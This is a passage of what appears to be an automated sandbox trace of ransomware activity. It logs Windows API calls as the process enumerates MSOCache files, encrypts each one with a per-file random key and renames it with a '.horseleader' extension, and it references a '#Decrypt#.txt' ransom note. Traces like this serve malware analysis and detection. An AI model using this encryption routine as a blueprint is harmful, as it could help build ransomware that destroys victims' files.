XZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0198.549] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0198.549] CloseHandle (hObject=0x1cc) returned 1 [0198.550] GetProcessHeap () returned 0x780000 [0198.550] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0198.550] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0198.550] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0198.550] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 66 [0198.550] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0198.550] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0198.550] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0198.550] GetProcessHeap () returned 0x780000 [0198.550] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0198.550] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*") returned 68 [0198.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0198.555] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0198.555] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.") returned 68 [0198.555] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0198.555] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0198.555] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0198.555] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0198.555] lstrlenW (lpString=".testttjffg") returned 11 [0198.555] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0198.555] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.555] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0198.555] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0198.555] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0198.555] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0198.555] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..") returned 69 [0198.555] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0198.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0198.555] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0198.556] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0198.556] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0198.556] lstrlenW (lpString=".testttjffg") returned 11 [0198.556] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0198.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0198.556] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0198.556] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0198.556] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Windows") returned -1 [0198.556] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0198.556] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".horseleader") returned 0x0 [0198.556] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0198.556] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="_uninstalling_.png") returned 1 [0198.556] lstrlenW (lpString=".testttjffg") returned 11 [0198.556] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", lpSrch=".testttjffg") returned 0x0 [0198.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0198.557] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0198.557] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0198.557] StrStrW (lpFirst="OneNoteMUI.msi", lpSrch=".txt") returned 0x0 [0198.557] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2503680) returned 1 [0198.557] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.557] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.561] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.561] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.562] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12f200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.562] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.573] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.573] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.573] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25e400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.573] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.575] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.576] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.576] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.576] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0198.576] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0198.576] CloseHandle (hObject=0x21c) returned 1 [0199.942] GetProcessHeap () returned 0x780000 [0199.942] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0199.942] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.horseleader") returned 93 [0199.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.horseleader")) returned 1 [0199.943] GetProcessHeap () returned 0x780000 [0199.943] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0199.944] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0199.944] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Windows") returned -1 [0199.944] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0199.944] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".horseleader") returned 0x0 [0199.944] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0199.944] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="_uninstalling_.png") returned 1 [0199.944] lstrlenW (lpString=".testttjffg") returned 11 [0199.944] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".testttjffg") returned 0x0 [0199.944] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0199.944] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0199.944] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0199.945] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0199.945] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".txt") returned 0x0 [0199.945] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1606) returned 1 [0199.945] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x646, lpOverlapped=0x0) returned 1 [0200.410] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0200.410] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x646, lpOverlapped=0x0) returned 1 [0200.410] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.410] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0200.411] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0200.411] CloseHandle (hObject=0x21c) returned 1 [0200.411] GetProcessHeap () returned 0x780000 [0200.411] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0200.411] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.horseleader") returned 93 [0200.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.horseleader")) returned 1 [0200.413] GetProcessHeap () returned 0x780000 [0200.413] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0200.413] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0200.413] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Windows") returned -1 [0200.413] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0200.413] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".horseleader") returned 0x0 [0200.413] lstrcmpW (lpString1="OnoteLR.cab", lpString2="#Decrypt#.txt") returned 1 [0200.413] lstrcmpW (lpString1="OnoteLR.cab", lpString2="_uninstalling_.png") returned 1 [0200.413] lstrlenW (lpString=".testttjffg") returned 11 [0200.413] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".testttjffg") returned 0x0 [0200.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0200.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0200.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0200.415] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0200.415] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".txt") returned 0x0 [0200.415] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=17456632) returned 1 [0200.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.415] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.376] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0201.376] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.376] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8506fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.376] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.632] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0201.633] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.633] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10a0df8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.633] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0202.192] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0202.192] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0202.193] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.193] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0202.193] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0202.193] CloseHandle (hObject=0x21c) returned 1 [0202.193] GetProcessHeap () returned 0x780000 [0202.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0202.194] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.horseleader") returned 90 [0202.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.horseleader")) returned 1 [0202.195] GetProcessHeap () returned 0x780000 [0202.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0202.195] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0202.195] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0202.195] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0202.195] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0202.195] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0202.195] lstrcmpW (lpString1="Setup.xml", 